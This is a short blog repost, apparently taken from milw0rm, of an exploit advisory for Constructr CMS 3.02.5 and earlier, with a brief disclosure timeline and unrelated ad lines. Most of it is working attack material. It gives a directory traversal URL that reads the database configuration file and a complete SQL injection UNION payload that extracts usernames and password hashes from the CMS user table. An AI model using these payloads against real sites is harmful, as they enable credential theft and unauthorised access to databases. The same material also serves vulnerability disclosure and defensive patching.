21

Dec

Constructr CMS <= 3.02.5 Stable Multiple Remote Vulnerabilities

Posted by admin  Published in Hacking

Play online games at GameDuell.
New Training Titles for Audio Software, Hardware & Technical Skills.
Shockwave has the game Risk! Buy it now!
Join LinkShare Today!
SYNC Outlook and Files on all your Computers

Constructr CMS
http://constructr-cms.org/

- <= 3.02.5 "Stable" -

magic_quotes_gpc = Off
register_globals = On

- Directory Traversal - Source Disclosure - Arbitrary File Creation - Etc Etc Etc -
http://site/constructr/backend/template.php?edit_file=

Db info:
../config/config.inc.php

- SQL -
http://site/constructr/?show_page=

User (urlencode) :
-0' UNION ALL SELECT NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)),
CHAR(32)),CHAR(0),IFNULL(CAST(hash AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL,
NULL, NULL, NULL, NULL, NULL FROM constructr_user# AND 'tBkML'='tBkML
"Hash" is the password, not really encrypted...

- Timeline -
Author notified: Dec 12
Public Disclosure: Dec 19

- Seasons Greetings -
- http://nukeit.org -

(Captured from milw0rm.com)

Related Articles

No user responded in this post

Subscribe to this post comment rss or trackback url
Leave A Reply

 Username (Required)

 Email Address (Remains Private)

 Website (Optional)